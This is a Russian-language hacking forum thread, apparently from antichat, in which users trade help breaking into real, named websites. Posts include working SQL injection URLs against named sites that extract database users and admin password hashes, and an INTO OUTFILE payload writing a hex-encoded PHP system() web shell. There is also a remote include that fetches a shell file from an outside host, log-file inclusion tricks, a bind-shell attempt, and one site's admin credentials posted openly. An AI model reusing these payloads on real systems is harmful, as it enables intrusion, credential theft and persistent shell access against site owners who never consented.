profile.php?mode=editprofile&cmd=GET%20http://site.com/sh.txt%20>%20sh.php получил смд пытаюсь так залить. шел в пхпбб2 но файл не создаётся в чём трабла?
если allow_url_include On , то залей include($_GET[lol]); , и profile.php?mode=editprofile&lol=http://site.com/sh.txt , или пробуй через аватарки, _http://forum.antichat.ru/showpost.php?p=198446&postcount=3
вообщем есть скуля) пароли вытащил, но они мне оказались никчему( теперь пробую залить шелл, делаю запрос : -999+union+select+1,2,0x3c3f206563686f205c223c7072653e5c223b4073797374656d28245f4745545b5c22636d645c225d293b6563686f205c223c2f7072653e5c223b3f3e,4,5,6+INTO+OUTFILE+'/var/www/bans/z.php'-- В ответ получаю ошибку: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/var/www/bans/z.php-- ORDER BY date ASC' at line 1 пробовал убирать ковычки, дописывать ковычки, записывать путь в hex, ничего хорошего не вышло... опытные кулхацкеры подскажите ламеру чё делать
Для того чтобы залился нужно: 1. magic_quotes_gpc = Off 2. file_priv Y 3. папка, доступная на запись в поле, где выводятся цифры, напиши 's' , если вывелось s - magic_quotes_gpc = off. делаешь запрос - ....from mysql.user where user= 'username' , username берёшь с того, что выводит user() ну и нужно найти диру, в которую шелл загрузишь _http://forum.antichat.ru/thread104591.html , см Вопрос №7
путь не обрамлен ковычками, если ковычки слешируются try https://forum.antichat.ru/showpost.php?p=663815&postcount=39 других вариантов на сегодняшний день не имеется
Помогите парни залить шелл. Не могу понять куда можно... Если можно то поподробней http://www.heel.com.ua Админка внизу сайта логин: admin pass: shutnick
вот у меня вопрос по поводу открытия RDP на машине с Win. Там стоит мускул 5. Неоднократно открыл через скул рдп на mssql но есть ли возможность через мускул?
Не могу больше ничего получить, не хватает думалки: Code: http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables-- Что из этого можно вытянуть? 77-log:3g-administrator@localhost
а там ничего толкового не получишь... Code: http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,admin_id,admin_name%29,9,10,11,12+from+admin-- колонки с пассами нет((
/var/www/heelezTH/heel.com.ua/fckeditor/editor/filemanager/browser/default/connectors/php/commands.php http://www.heel.com.ua/index.php?view=news&id=-487+UNION+SELECT+1,2,CONCAT%28Version%28%29,Database%28%29,User%28%29%29,4,5,6,7,8--%20+
все зделаю и ок..а в конце не полуцается.. а зацем ?? http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62),0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword),3+from+g2_User
Таблица в другой базе данных http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62),0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword),3+from+usr_web0_2.g2_User
делаю бинд порт на freebsd,проверяю Code: tcp 0 0 0.0.0.0:37695 0.0.0.0:* LISTEN порт открылся,пробую приконектится Code: nc Cmd line: xx.xx.xx.xx 37695 (UNKNOWN) [xx.xx.xx.xx] 37695 (?) : Connection timed out в чем может быть проблема ?
всем привет! у меня такой вопрос... ктонибудь пробовал заливать шелл,или хотябы выполнять какието команды через: ../../../../../../proc/self/fd/2 -я знаю што это логи апача, но там внутри содержание больше напоминает пхп сессии.
547 Ну так посмотри что туда пишется, пиши и инклудь. В чём проблема-то? Если это error_log то возможно туда пишется Referer
Да нафиг ты мне пути даешь? и Скулю. Это то все и сам могу. Мне интересно как шелл залить... И через этот менеджер только картинки и то ограниченные. А как пхп залить?
